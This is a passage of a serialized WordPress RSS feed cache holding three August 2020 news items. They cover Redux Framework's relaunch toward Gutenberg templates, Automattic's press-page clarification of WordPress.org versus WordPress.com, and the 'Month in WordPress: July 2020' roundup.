\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"WPTavern: Redux Framework Relaunches, Focuses Efforts on Gutenberg Templates\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=98604\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:195:\"https://wptavern.com/redux-framework-relaunches-focuses-efforts-on-gutenberg-templates?utm_source=rss&utm_medium=rss&utm_campaign=redux-framework-relaunches-focuses-efforts-on-gutenberg-templates\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:13983:\"<p class=\"has-drop-cap\">D&#333;vy Paukstys was rushing out another update with bug fixes yesterday morning as we chatted about the future of his popular <a href=\"https://redux.io/\">Redux Framework</a>. It was not the first update of the day. The Virginia-based developer is just over a week into what he has called the <em>soft launch</em> of Redux 4.x. It is a major reconstruction of a plugin that has been powering over 900,000 websites and has a strong developer audience.</p>\n\n\n\n<p>The changes over the past week might seem risky to some. He has built a massive user base by providing one of the most <a href=\"https://wordpress.org/plugins/redux-framework/\">powerful theme and plugin options frameworks</a> in WordPress history. The plugin&rsquo;s new focus leans heavily toward the block editor, which is still one of the most controversial features of WordPress, even after nearly two years as part of the core platform.</p>\n\n\n\n<p>Paukstys needed to make a change. The developer-only approach was not generating the return on investment that he needed. The $7,000 in donations and subscriptions received in 2019 was not sustainable, especially when products on the Envato marketplace had generated at least $56 million on the back of Redux, according to data he had gathered. He was leaving far too much money on the table. Redux was a successful product on the surface, but developers were either unwilling to pony up the cash or the business plan was not working. It was time for something new.</p>\n\n\n\n<p>It was not merely time for a change because the business was essentially going nowhere. The game was and is still changing. Theme options, the bread and butter of Redux, will likely be a thing of the past in the next year or two. Themes will become far less reliant on options panels. Developers will need to build their offerings around the block system and plugins like Redux need to keep up.</p>\n\n\n\n<p>The writing was on the wall. The best time to profit from a theme options framework was the past decade. Whether it is the <a href=\"https://wptavern.com/will-page-builders-remain-competitive-in-the-block-era\">block editor or a page-building plugin</a> like Elementor, design options are on the individual page level now, or at least not buckled into old-school concepts like theme options panels or the customizer.</p>\n\n\n\n<p><em>The times they are a-changin&rsquo;</em>, and Redux is changing with them.</p>\n\n\n\n<p>Paukstys is no stranger to moving with the flow. It has allowed his framework&rsquo;s user numbers to continue growing over the years. In 2015, he shifted gears and focused on making sure his framework <a href=\"https://wptavern.com/redux-and-kirki-frameworks-join-forces-to-provide-better-support-for-the-wordpress-customizer\">supported the customizer</a>. This came after a controversial decision from the Themes Team to <a href=\"https://wptavern.com/wordpress-org-now-requires-theme-authors-to-use-the-customizer-to-build-theme-options\">require the use of the customizer</a> instead of custom theme options screens. Paukstys was a vocal opponent of the decision and still believes the customizer never panned out. In hindsight, he may have been right; the customizer has felt like an abandoned project over the past couple of years. Still, he made the necessary moves to keep his options framework relevant when necessary.</p>\n\n\n\n<p>Today, he is propelling Redux into a new era in which blocks reign supreme.</p>\n\n\n\n<p>&ldquo;If Redux didn&rsquo;t go into the world of blocks it would eventually be a thing of yesterday,&rdquo; he said. &ldquo;The future is blocks and that&rsquo;s where we are putting our focus. We&rsquo;re excited to once again be on the cutting edge and we hope our product can really help users, freelancers, and agencies build and improve their sites in ways they never have before.&rdquo;</p>\n\n\n\n<p>What he and the Redux team has done is tack an entirely new set of user-focused features onto what was once a developer platform. Even the marketing has changed. Redux is now in the business of providing and upselling features to end-users. It is no longer taking a backseat to the theme and plugin authors who have profited in the millions upon its developer API. The team is taking the steering wheel and driving toward its own future.</p>\n\n\n\n<h2>What Does the New Redux Do?</h2>\n\n\n\n<img />Ice Cream shop template kit.\n\n\n\n<p class=\"has-drop-cap\">Redux still does all the things it has always done. Developers can build custom settings screens and offer whatever options they want to their own end-users. The most glaring addition is the new <a href=\"https://templates.redux.io/\">Redux Templates</a> feature, which directly integrates with the block editor.</p>\n\n\n\n<p>&ldquo;Redux Templates acts as a block discovery library if you will,&rdquo; said Paukstys. &ldquo;We bring all templates provided by third-party plugins into a single library. You can essentially see and preview what&rsquo;s possible, click, and import.&rdquo;</p>\n\n\n\n<p>Redux also has a built-in block dependency installer. When importing third-party templates or blocks, it will check if the plugin is installed and active. If not, it will take care of that for users.</p>\n\n\n\n<p>The end goal is to ease the trouble of finding advanced block templates. Currently, most of the block templating plugins are dispersed, projects wondering around the wild. Users cannot find what they need if they do not know where to look. Redux changes all of that. Currently, it supports 18 different block plugins. It serves to give more exposure to existing block plugins and helps users discover solutions they might not have otherwise found.</p>\n\n\n\n<p>On the post-editing screen, the plugin adds a new &ldquo;Templates&rdquo; button to the top toolbar. Once clicked, it opens a popup with its library of sections, templates, and template kits.</p>\n\n\n\n<img />Viewing templates from the Redux library.\n\n\n\n<p>One of the nicer features of the plugin is its previewer. By clicking the preview button, users can see what a section or template looks like before importing anything. On the left side of the previewer, the plugin displays tabs that show what blocks are used and what required plugins would need to be installed and activated.</p>\n\n\n\n<p>Redux leaves little to the imagination. Any necessary information about what is being installed is directly available. Plus, it provides links to any plugins that might be installed.</p>\n\n\n\n<img />Previewing a contact template.\n\n\n\n<p>The great thing is that the Templates feature does not lock the user down to the Redux plugin. If a user wants to deactivate Redux in the future, nothing will change with their blocks. It is primarily serving as a bridge between end-users and the massive world of block projects.</p>\n\n\n\n<p>&ldquo;We see the future of options being diminished in the long run by blocks, so we found a way to move into that space to keep Redux always on the cutting edge,&rdquo; said Paukstys. His team completely rewrote the underlying framework and brought everything up to the WordPress coding standards.</p>\n\n\n\n<p>The move to support blocks is more of a repositioning of a project whose days were numbered.</p>\n\n\n\n<p>Paukstys stressed that Redux has every feature that it had before and even more. The team added CSS variables for developers if they prefer using them over a compiler. He feels like the core framework has improved drastically, which means old users can continue enjoying the features they have become accustomed to.</p>\n\n\n\n<h2>A New Business Plan</h2>\n\n\n\n<img />\n\n\n\n<p class=\"has-drop-cap\">Make no mistake. Paukstys is looking to grow the revenue of his business and create a sustainable future for Redux. The <a href=\"https://redux.io/pricing/\">pricing plan</a> is clear and follows a model that has been successful for many commercial plugins over the years. The plans are tiered and range from $49 per year to $249, depending on the number sites the user wants automatic updates and support for.</p>\n\n\n\n<p>The commercial plans offer new features for developers like automated Google Font updates, custom fonts integrated into all panels, unlimited widget areas, and dynamic search.</p>\n\n\n\n<p>However, the big upsell is landing directly on the doorstep of end-users. Each of the commercial plans offers full access to over 1,000 sections and full-page templates. The breadth of options can almost be overwhelming, but the average user will be able to find nearly any type of template needed for their site. From restaurants to corporate offices to fitness studios, there is a little something for everyone.</p>\n\n\n\n<p>&ldquo;I was all too altruistic,&rdquo; said Paukstys of the previous years. &ldquo;I believed that if I helped people make money, they&rsquo;d give back. Unfortunately, that is not how it works. I&rsquo;ve worked for years with various pricing models, each doomed to fail.&rdquo; He had seen others rise to business success, quite often on the work that he had put in. It is not all about money, and he believes he has something of value to offer in return.</p>\n\n\n\n<p>Development skill is not enough to breed financial success. Sound financial principles must back it up.</p>\n\n\n\n<p>One of the catalysts for recent changes to his business plan was joining <a href=\"https://poststatus.com/\">Post Status</a>, which has a strong community of business leaders in the WordPress ecosystem. He credits Alex Denning, Kimberly Lipari, Haris Zulfiqar, Rich Tabor, and others as inspiration, helping him to shift his thinking around the business side of the project.</p>\n\n\n\n<p>Some of the lessons he has learned thus far are:</p>\n\n\n\n<ul><li>Developers are already starved. Focus on users.</li><li>Add-ons can be a bad model. A single pro/premium product is much easier to sell and manage.</li><li>The need for a revenue model. Don&rsquo;t expect people to just hand over money.</li><li>Use the audience you have. Don&rsquo;t cannibalize yourself.</li></ul>\n\n\n\n<p>&ldquo;Where we&rsquo;ve ended up is a <em>much</em> cheaper plan for developers and a powerful toolkit for users,&rdquo; he said. &ldquo;Hopefully, we&rsquo;re pushing Gutenberg into a greater place of value.&rdquo;</p>\n\n\n\n<h2>Moving Forward</h2>\n\n\n\n<p class=\"has-drop-cap\">Naturally, not every user will be happy with the overhaul of the plugin. For years, Redux was geared specifically toward developers. It was an options framework.</p>\n\n\n\n<p>&ldquo;Redux was for a completely different purpose which is for developers to create Options framework,&rdquo; wrote a user named James <a href=\"https://wordpress.org/support/topic/dishonest-and-bad-performance/\">in a review</a>. &ldquo;They have changed the plugin suddenly to a page builder something like that. It doesn&rsquo;t make sense and they are using the previous plugin&rsquo;s reputation.&rdquo;</p>\n\n\n\n<p>It is a fair criticism. And, it was expected. The plugin has switched much of its focus to end-users. However, it has not removed the existing API and features that made it successful with developers in the past.</p>\n\n\n\n<p>Paukstys is clear that he is building on top of the reputation that Redux has earned and launching new features for end-users. He is unapologetic about trying something new to bring in a reasonable return on his years-long investment of time and resources. Launching a completely new and separate project would carry far more risk. It makes sense to build atop the mountain he had already built.</p>\n\n\n\n<p>It won&rsquo;t make everyone happy. However, he said that the feedback has been &ldquo;shockingly positive&rdquo; in the week since the Redux 4 soft launch.</p>\n\n\n\n<p>&ldquo;I&rsquo;ve never realized how much users appreciated Redux,&rdquo; he said. &ldquo;Some of the changes to the framework broke sites, and everyone I have reached out to help has been so extremely gracious. It&rsquo;s so refreshing and honestly helps me to see why the WordPress community is such a great place to be. I fear developers are too harsh to one another. Users on the other hand, if provided kind support, are in turn incredibly kind.&rdquo;</p>\n\n\n\n<p>If most of the feedback thus far is any indication of the plugin&rsquo;s future, do not expect to see pitchforks and torches.</p>\n\n\n\n<p>He might have to take a few lumps with a few disgruntled users over the change. It comes with the territory. However, feedback will likely directly correlate with how well he serves users through the Redux support channels.</p>\n\n\n\n<p>The project will also benefit from a potentially new user base in the coming months and years. The plugin is dipping its toes into a new market while maintaining the features that got it to where it is today. It will be a bit of a balancing act, but the plugin must move with the times.</p>\n\n\n\n<h2>The Future of Redux</h2>\n\n\n\n<p class=\"has-drop-cap\">This is a new era for Redux. In the immediate future, Paukstys and team will need to focus on ironing out all of the bugs and the transition to a new market. It is a time for reflection, careful listening, and attentiveness before diving headlong into new features.</p>\n\n\n\n<p>&ldquo;In the past, we were 100% developer-centric,&rdquo; said Paukstys. &ldquo;That being said, we always had our eye on the user and wanted to fulfill their needs. Now we&rsquo;re expanding to support the users directly, as well as developers.&rdquo;</p>\n\n\n\n<p>With the newfound focus on end-users, there is potential for growth in other areas. Paukstys says the focus is 100% on the block editor at present. Branching out to support other major page builders like Elementor is not out of the question. However, Redux should be able to continue finding success by extending the core experience.</p>\n\n\n\n<p>&ldquo;When we started this adventure into the blocks space, we worried, given the limited number of blocks out there,&rdquo; he said. &ldquo;But honestly, there&rsquo;s some amazing innovation out there, and it&rsquo;s been pretty great what we can build with Gutenberg.&rdquo;</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 04 Aug 2020 14:21:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:34;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:102:\"WPTavern: Automattic Updates Press Page to Clarify Distinction between WordPress.org and WordPress.com\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=102612\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:249:\"https://wptavern.com/automattic-updates-press-page-to-clarify-distinction-between-wordpress-org-and-wordpress-com?utm_source=rss&utm_medium=rss&utm_campaign=automattic-updates-press-page-to-clarify-distinction-between-wordpress-org-and-wordpress-com\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6031:\"<p>Last week, Automattic&rsquo;s marketing team made a positive step towards curbing the perennial branding confusion between WordPress.org and WordPress.com. The company&rsquo;s <a href=\"https://automattic.com/press/\">press page</a> was updated with a notice to journalists who are writing about Automattic:</p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>Automattic owns and operates&nbsp;<a href=\"https://wordpress.com/\">WordPress.com</a>, which is a hosted version of the open source WordPress software with added features for security, speed and support. Please append &ldquo;.com&rdquo; when referencing our product name.</p><p><a href=\"http://wordpress.org/\">WordPress</a>&nbsp;is open source software, which is written, maintained, and supported by thousands of independent contributors worldwide. Automattic is a major contributor to the WordPress open source project. If you would like to contribute to the WordPress open source project, learn more at&nbsp;<a href=\"https://make.wordpress.org/\">make.wordpress.org</a>.</p></blockquote>\n\n\n\n<p>This update was prompted by a recent <a href=\"https://www.linkedin.com/posts/caspar-hubinger_wordpress-activity-6688334765575176192-0-Eh\">conversation on LinkedIn</a> between Caspar H&uuml;binger, who works as a digital marketer at Human Made, and WordPress.com CMO Monica Ohara. H&uuml;binger had posted regarding an inaccuracy in a recent New York Times <a href=\"https://www.nytimes.com/2020/07/12/business/matt-mullenweg-automattic-corner-office.html\">article</a> featuring Matt Mullenweg as an evangelist for remote work at Automattic. The article, which has since been corrected, misattributed Automattic as the company that &ldquo;runs the digital publishing platform WordPress.&rdquo; </p>\n\n\n\n<p>These kinds of mistakes are quite frequent, yet understandable, in publications that are not as familiar with the WordPress ecosystem. Yet, these errors often evoke a strong reaction from the project&rsquo;s community whenever they pop up in the media. </p>\n\n\n\n<p>Ohara commented on H&uuml;binger&rsquo;s post and exchanged direct messages where he made a case for clarifying the branding on Automattic&rsquo;s website. Ohara was amenable and the notice appeared shortly after the exchange.</p>\n\n\n\n<p>Several years ago H&uuml;binger created a <a href=\"https://wpisnotwp.com/\">website</a> to clarify the confusion between WordPress, the open source project, and WordPress.com. Post Status also has a <a href=\"https://poststatus.com/resources/wordpress-versus-automattic/\">resource page</a> that explains the difference between WordPress.org and Automattic&rsquo;s products, but these kinds of external resources never seemed to make much of a difference. </p>\n\n\n\n<p>In 2018, H&uuml;binger prevailed upon the author of a TechCrunch article who referenced&nbsp;<a rel=\"noreferrer noopener\" target=\"_blank\" href=\"http://wordpress.com/\">WordPress.com</a>&nbsp;as &ldquo;WordPress&rdquo; and worked with her on getting the difference documented in TechCrunch&rsquo;s internal editorial guidelines. After he had explained the problem, she replied: &ldquo;We had no policy on this. We&rsquo;re going to change it to .com (or make references to Automattic as needed), and note in our style guide.&rdquo;</p>\n\n\n\n<p>When asked why he finds himself a champion of this particular cause, he said he often found himself angry when the name of the open source project he has dedicated most of his digital career to was confused with a commercial service built on top of it.</p>\n\n\n\n<p>&ldquo;It&rsquo;s a distortion of reality and I always felt sort of betrayed when it happened,&rdquo; H&uuml;binger said.</p>\n\n\n\n<p>&ldquo;I know that many of my community peers feel hurt to this day, even if some of them would probably shrug it off when asked. The word for it is resignation, and to me, it is poison to the human soul. From my perspective, Automattic&rsquo;s passiveness actively fed the narrative that they were profiting from the naming confusion, and that narrative &ndash; true or not &ndash; it keeps poisoning WordPress&rsquo; open source community.&rdquo;</p>\n\n\n\n<p>Although many times articles with errors confusing WordPress and .com were corrected afterwards, it can take a few days after the initial rush of traffic hits. </p>\n\n\n\n<p>&ldquo;So the message that &lsquo;Automattic runs/owns WordPress&rsquo; keeps being established for the public,&rdquo; H&uuml;binger contended when making his case to Ohara. &ldquo;Worse, the burden of flagging miscommunication when it happens and having it corrected in many cases is left to those who are harmed by it, i.e. open source contributors.&rdquo;</p>\n\n\n\n<p>For years people have speculated whether Automattic might rename WordPress.com to avoid the longstanding confusion. Many believe it will never happen, since the company undoubtedly benefits from tightly coupling its products to WordPress&rsquo; name recognition. Ohara declined to comment on whether any major branding changes are on the horizon.</p>\n\n\n\n<p>&ldquo;I will say that we&rsquo;re not trying to compete with the WordPress ecosystem,&rdquo; Ohara said. &ldquo;We want to help the overall ecosystem grow and I look forward to working closely with the community.&rdquo;</p>\n\n\n\n<p>This small yet important change to Automattic&rsquo;s press page is the direct result of H&uuml;binger&rsquo;s persistent advocacy effort. It may not eliminate all future media errors, but it is a positive development that demonstrates someone is listening.</p>\n\n\n\n<p>&ldquo;While a dedicated press page will not be able to prevent future confusion of WordPress and WordPress.com altogether (because it simply isn&rsquo;t possible), my hope is that it will be seen as a first practical step to help heal the relationship between Automattic and parts of WordPress&rsquo; open source community, which so many Automatticians have made such incredible amounts of contributions to ever since the company existed, and that is another thing that is too easy to forget,&rdquo; H&uuml;binger said.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 03 Aug 2020 17:35:09 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:35;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"WordPress.org blog: The Month in WordPress: July 2020\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=8755\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"https://wordpress.org/news/2020/08/the-month-in-wordpress-july-2020/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:11541:\"<p>July was an action-packed month for the WordPress project. The month saw a lot of updates on one of the most anticipated releases &#8211; WordPress 5.5! WordCamp US 2020 was canceled and the WordPress community team started experimenting with different formats for engaging online events, in July. Read on to catch up with all the updates from the WordPress world.</p>\n\n\n\n<hr class=\"wp-block-separator\" />\n\n\n\n<h2>WordPress 5.5 Updates</h2>\n\n\n\n<p>July was full of WordPress 5.5 updates! The WordPress 5.5 <a href=\"https://wordpress.org/news/2020/07/wordpress-5-5-beta-1\">Beta 1</a> came out on July 7, followed by <a href=\"https://wordpress.org/news/2020/07/wordpress-5-5-beta-2/\">Beta 2</a> on July 14, <a href=\"https://wordpress.org/news/2020/07/wordpress-5-5-beta-3/\">Beta 3</a> on July 21, and <a href=\"https://wordpress.org/news/2020/07/wordpress-5-5-beta-4/\">Beta 4</a> on July 27. Subsequently, the team also published the first <a href=\"https://wordpress.org/news/2020/07/wordpress-5-5-release-candidate/\">release candidate</a> of WordPress 5.5 on July 28.&nbsp;</p>\n\n\n\n<p>WordPress 5.5, which is slated for release on <a href=\"https://make.wordpress.org/core/5-5/\">August 11, 2020</a>, is a major update with features like <a href=\"https://make.wordpress.org/core/tag/feature-autoupdates/\">automatic updates for plugins and themes</a>, a <a href=\"https://make.wordpress.org/plugins/2020/07/22/proposed-block-directory-guidelines/\">block directory</a>, <a href=\"https://make.wordpress.org/core/2020/06/10/merge-announcement-extensible-core-sitemaps/\">XML sitemaps</a>, <a href=\"https://make.wordpress.org/core/2020/07/16/block-patterns-in-wordpress-5-5/\">block patterns</a>, and <a href=\"https://make.wordpress.org/core/2020/07/14/lazy-loading-images-in-5-5/\">lazy-loading images</a>, among others. To learn more about the release, check out its <a href=\"https://make.wordpress.org/core/2020/07/30/wordpress-5-5-field-guide/\">field guide post</a>.</p>\n\n\n\n<p>Want to get involved in building WordPress Core? Follow<a href=\"https://make.wordpress.org/core/\"> the Core team blog</a>, and join the #core channel in <a href=\"https://make.wordpress.org/chat/\">the Making WordPress Slack group</a>.</p>\n\n\n\n<h2>Gutenberg 8.5 and 8.6</h2>\n\n\n\n<p>The core team launched Gutenberg <a href=\"https://make.wordpress.org/core/2020/07/08/whats-new-in-gutenberg-8-july/\">8.5</a> and <a href=\"https://make.wordpress.org/core/2020/07/22/whats-new-in-gutenberg-july-22/\">8.6</a>. Version 8.5 &#8211; the last plugin release will be included entirely (without experimental features) in WordPress 5.5, introduced improvements to block drag-and-drop and accessibility, easier updates for external images, and support for the block directory. Version 8.6 comes with features like Cover block video position controls and block pattern updates. For full details on the latest versions on these Gutenberg releases, visit these posts about <a href=\"https://make.wordpress.org/core/2020/07/08/whats-new-in-gutenberg-8-july/\">8.5</a> and <a href=\"https://make.wordpress.org/core/2020/07/22/whats-new-in-gutenberg-july-22/\">8.6</a>.</p>\n\n\n\n<p>Want to get involved in building Gutenberg? Follow <a href=\"https://make.wordpress.org/core/\">the Core team blog</a>, contribute to <a href=\"https://github.com/WordPress/gutenberg/\">Gutenberg on GitHub</a>, and join the #core-editor channel in <a href=\"https://make.wordpress.org/chat/\">the Making WordPress Slack group</a>.</p>\n\n\n\n<h2>Reimagining Online WordPress Events</h2>\n\n\n\n<p>The Community team made the difficult decision <a href=\"https://make.wordpress.org/community/2020/07/27/in-person-events-in-rest-of-year-2020/\">to suspend in-person WordPress events for the rest of 2020</a> in light of the COVID-19 pandemic. The team has also started working on <a href=\"https://make.wordpress.org/community/2020/07/13/reimagining-online-events/\">reimagining online events</a>. Based on <a href=\"https://make.wordpress.org/community/2020/07/13/reimagining-online-events/#comment-28505\">feedback from the community members</a>, the team decided to <a href=\"https://make.wordpress.org/community/2020/07/23/moving-forward-with-online-events/\">make changes to the current online WordCamp format</a>. Key changes include wrapping up financial support for A/V vendors, ending event swag support for newer online WordCamps, and suspending the Global Community Sponsorship program for 2020. The team encourages upcoming online WordCamps to experiment with their events to facilitate an effective learning experience for attendees while avoiding online event fatigue. The team is currently working on a proposal to organize community-supported <a href=\"https://make.wordpress.org/community/2020/07/23/building-community-beyond-events/\">recorded workshops and synchronous discussion groups</a> to help community members learn WordPress.<br /><br />Want to get involved with the Community team? <a href=\"https://make.wordpress.org/community/\">Follow the Community blog here</a>, or join them in the #community-events channel in <a href=\"https://make.wordpress.org/chat/\">the Making WordPress Slack group</a>. To organize a Meetup or WordCamp, <a href=\"https://make.wordpress.org/community/handbook/virtual-events/welcome/applying-for-a-virtual-event/\">visit the handbook page</a>.&nbsp;</p>\n\n\n\n<h2>WordCamp US 2020 is canceled</h2>\n\n\n\n<p>The organizers of WordCamp US 2020 have <a href=\"https://2020.us.wordcamp.org/2020/07/30/wcus-2020-an-update/\">canceled the event</a> in light of the continued pandemic and online event fatigue. The flagship event, which was originally scheduled for October 27-29 as an in-person event, had already planned to transition to an online event. Several WCUS Organizers will be working with the WordPress Community team to focus on other formats and ideas for online events, including a 24-hour contributor day, and contributing to the workshops initiative <a href=\"https://make.wordpress.org/community/2020/07/23/building-community-beyond-events/\">currently being discussed</a>. Matt Mullenweg’s State of the Word (which typically accompanies WordCamp US) is likely to take place in a different format later in 2020.</p>\n\n\n\n<h2>Plugin and theme updates are now available over zip files</h2>\n\n\n\n<p>After eleven years, WordPress now allows users to update plugins and themes by <a href=\"https://core.trac.wordpress.org/changeset/48390\">uploading a ZIP file, in WordPress 5.5</a>.&nbsp; The feature, which was merged on July 7, has been one of the most requested features in WordPress. Now, when a user tries to upload a plugin or theme zip file from the WordPress dashboard by clicking the “Install Now” button, WordPress will direct users to a new screen that compares the currently-installed extension with the uploaded versions. Users can then choose between continuing with the installation or canceling. WordPress 5.5 will also offer <a href=\"https://make.wordpress.org/core/tag/feature-autoupdates/\">automatic plugin and theme updates</a>.&nbsp;</p>\n\n\n\n<hr class=\"wp-block-separator\" />\n\n\n\n<h2>Further Reading:</h2>\n\n\n\n<ul><li>The <a href=\"https://make.wordpress.org/plugins/2020/07/22/proposed-block-directory-guidelines/\">Block directory</a> is coming to WordPress with the 5.5 release. Plugin authors can now <a href=\"https://make.wordpress.org/plugins/2020/07/11/you-can-now-add-your-own-plugins-to-the-block-directory/\">submit their Block plugins to the directory</a>.</li><li>The Core team has opened up the <a href=\"https://make.wordpress.org/core/2020/07/31/wordpress-5-6-whats-on-your-wishlist/\">call for features</a> in the WordPress 5.6 release. You can <a href=\"https://make.wordpress.org/core/2020/07/31/wordpress-5-6-whats-on-your-wishlist/\">comment on the post</a> with features that you’d like to be included, current UX pain points, or maintenance tickets that need to be addressed. August 20 is the deadline for feature requests. </li><li>Editor features such as the new Navigation block, the navigation screen, and the widget screen that were originally <a href=\"https://make.wordpress.org/updates/2020/03/06/update-progress-on-goals/\">planned to be merged with WordPress 5.5</a> have been <a href=\"https://make.wordpress.org/core/2020/07/02/editor-features-for-wordpress-5-5-update/\">pushed for the next release</a>. </li><li>The Theme team is inviting proposals on whether to allow themes to <a href=\"https://make.wordpress.org/themes/2020/07/13/proposal-allow-themes-to-add-a-top-level-admin-menu/\">place an additional top-level menu link</a> in the admin.</li><li><a href=\"https://buddypress.org/2020/07/buddypress-6-2-0-beta/\">BuddyPress 6.2 beta </a>is out in the wild, and the team will soon release the stable version. The update includes changes that will make BuddyPress fully compatible with WordPress 5.5.</li><li>WordCamp EU 2021, which was being planned as an in-person event in Porto, Portugal, <a href=\"https://europe.wordcamp.org/2021/wordcamp-europe-2021-will-be-online/\">is moving online</a>. The team is considering an in-person WordCamp EU in 2022. </li><li>The Polyglots team has prepared and finalized a <a href=\"https://make.wordpress.org/polyglots/2020/07/09/translation-editor-locale-manager-vetting-criteria-page-draft/\">Translation Editor &amp; Locale Manager Vetting Criteria</a> to provide more clarity on how global mentors assign PTE/GTE/Locale Managers and to help locale teams set their own guidelines. The document, which was finalized <a href=\"https://make.wordpress.org/polyglots/2020/07/09/translation-editor-locale-manager-vetting-criteria-page-draft/\">after a lot of discussion</a>, is now available in the <a href=\"https://make.wordpress.org/polyglots/handbook/translating/expectations/translation-editor-locale-manager-vetting-criteria/\">Polyglots handbook</a>.</li><li>Members of the Community team <a href=\"https://make.wordpress.org/community/2020/07/03/proposal-recognition-for-event-volunteers-and-attendees-in-wordpress-org-profile/\">are discussing</a> whether WordCamp volunteers, WordCamp attendees, or Meetup attendees should be awarded a WordPress.org profile badge. The ongoing discussion will be open for comments until August 13.</li><li>The <a href=\"https://make.wordpress.org/core/tag/feature-notifications/\">WP Notify project</a>, which aims to create a better way to manage and deliver notifications to the relevant audience, is on to its next steps. The team has finalized the initial requirements, and is <a href=\"https://make.wordpress.org/core/2020/07/09/wp-notify-next-steps/\">kicking off the project build</a>.</li><li>The WordPress documentation team is <a rel=\"noreferrer noopener\" href=\"https://make.wordpress.org/docs/tag/external-linking-policy/\" target=\"_blank\">considering a ban on links to commercial websites</a> in a revision to its external linking policy. The policy change does not remove external links to commercial sites from WordPress.org and only applies to documentation sites. The idea is to protect documentation from being abused, and to prevent the WordPress project from being biased. Discussion on this post is still ongoing, and a decision has not yet been made. Feel free to<a href=\"https://make.wordpress.org/docs/tag/external-linking-policy/\"> comment on the discussion posts</a>, if you would like to share your thoughts on the topic. </li></ul>\n\n\n\n<p><em>Have a story that we should include in the next “Month in WordPress” post? Please </em><a href=\"https://make.wordpress.org/community/month-in-wordpress-submissions/\"><em>submit it here</em></a><em>.</em></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 03 Aug 2020 13:54:23 